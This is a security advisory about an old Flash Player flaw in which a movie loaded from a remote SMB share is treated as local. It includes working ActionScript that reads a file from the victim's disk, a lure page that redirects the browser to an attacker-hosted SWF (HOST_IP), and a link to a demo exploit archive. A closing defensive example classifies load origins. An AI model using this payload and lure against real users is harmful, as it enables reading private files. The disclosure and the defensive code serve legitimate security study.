COMMAND

    Flash player can read local files

SYSTEMS AFFECTED

    All ?

PROBLEM

    jelmer [jkuperus@xs1.xs4all.nl] found :

    The flaw lies in the fact that when a Flash movie is loaded from a
    remote SMB share, it is treated as though it was loaded from the
    user's hard disk, allowing the following ActionScript code to work:

        // Load a local file through the XML object and show it in a text field
        urlXML = new XML();
        urlXML.onLoad = readXML;
        myField = "Loading data...";
        urlXML.load("file:///C:/jelmer.txt");

        // Called when loading finishes; copies the file contents into myField
        function readXML() {
            myField = urlXML.toString();
        }

    It uses Flash's XML control to read and display the contents of
    c:\jelmer.txt.

    In order for it to work, one has to get a user to view a specially
    crafted web page, which could look like this:

        <script language="javascript">
        document.location.href='\\\\HOST_IP\\exploit\\read.swf';
        </script>

    It points the browser to the SWF on the SMB share so that it displays
    it.

    Demonstration
    =============

    Download the following file and extract the contained SWF to a remote
    share, then start it from there (for instance by dragging it from the
    share into Explorer or creating an HTML file as described above):

        http://www.xs4all.nl/~jkuperus/exploit.zip

    It will read and display the contents of c:\jelmer.txt.

SOLUTION

    ?
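
The distinction the flaw misses, as an added example (not code from the advisory or from Flash Player): the movie's load location is classified before any file:// request is honoured, and UNC paths and file: URLs that name a host count as remote. toWindowsPath, classifyOrigin and mayLoad are hypothetical names, and every host name other than HOST_IP is constructed.

```javascript
// Added example: decide whether a movie's load location is a local disk or
// a network location. All function names here are hypothetical.

// Reduce a file: URL or a path to a Windows-style path with backslashes.
function toWindowsPath(location) {
  const s = String(location).trim();
  if (!/^file:/i.test(s)) return s.replace(/\//g, "\\");
  const u = new URL(s);
  const path = decodeURIComponent(u.pathname).replace(/\//g, "\\");
  // file://HOST/share/x names an SMB server in the host part.
  if (u.hostname && u.hostname !== "localhost") return "\\\\" + u.hostname + path;
  // file:////HOST/share/x hides the server name in the path part.
  if (/^\\{2,}[^\\]/.test(path)) return "\\\\" + path.replace(/^\\+/, "");
  // file:///C:/x is a drive path; drop the leading separator.
  return path.replace(/^\\+(?=[A-Za-z]:)/, "");
}

function classifyOrigin(location) {
  const s = String(location).trim();
  // Any scheme other than file: (http, https, ftp, ...) is remote.
  // A single-letter "scheme" such as C: is a drive letter and is not matched.
  if (/^[a-z][a-z0-9+.-]+:/i.test(s) && !/^file:/i.test(s)) return "remote";
  let p;
  try { p = toWindowsPath(s); } catch (e) { return "remote"; } // fail closed
  if (/^\\\\[?.]\\UNC\\/i.test(p)) return "remote";   // \\?\UNC\host\share
  p = p.replace(/^\\\\[?.]\\/, "");                   // \\?\C:\x -> C:\x
  if (/^\\\\/.test(p)) return "remote";               // \\host\share (SMB)
  // A drive letter can still be a mapped network drive; the string alone
  // cannot tell, so a real check also has to ask the OS (GetDriveType).
  if (/^[A-Za-z]:\\/.test(p)) return "local";
  return "remote";                                    // relative or unknown
}

// Policy: only a movie loaded from local disk may request non-network URLs.
// Anything that is not http/https/ftp is treated as a file request.
function mayLoad(movieLocation, requestedUrl) {
  const isFileRequest = !/^(https?|ftp):/i.test(String(requestedUrl).trim());
  return !isFileRequest || classifyOrigin(movieLocation) === "local";
}
```
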